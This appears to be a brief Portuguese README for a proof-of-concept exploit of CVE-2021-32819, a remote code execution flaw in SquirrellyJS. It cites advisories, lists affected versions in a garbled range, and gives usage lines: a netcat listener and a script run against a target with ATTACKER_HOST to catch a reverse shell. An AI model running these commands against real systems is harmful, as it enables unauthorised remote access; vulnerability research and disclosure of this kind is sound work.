
SquirrellyJS mistura dados puros de template com opções de configuração do motor através da API de renderização do Express. Ao sobrescrever opções de configuração internas, a execução remota de código pode ser desencadeada em aplicações downstream.
CVE-2021-32819: SquirrellyJS mistura dados puros de template com opções de configuração do motor através da API de renderização do Express. Ao sobrescrever opções de configuração internas, a execução remota de código pode ser desencadeada em aplicações downstream.
https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
v8.0.0 >= v8.0.8 Execução Remota de Código
Ubuntu 20.04.1
nc -lvp 443
python3 exploit.py http://example.com/ ATTACKER_HOST 443
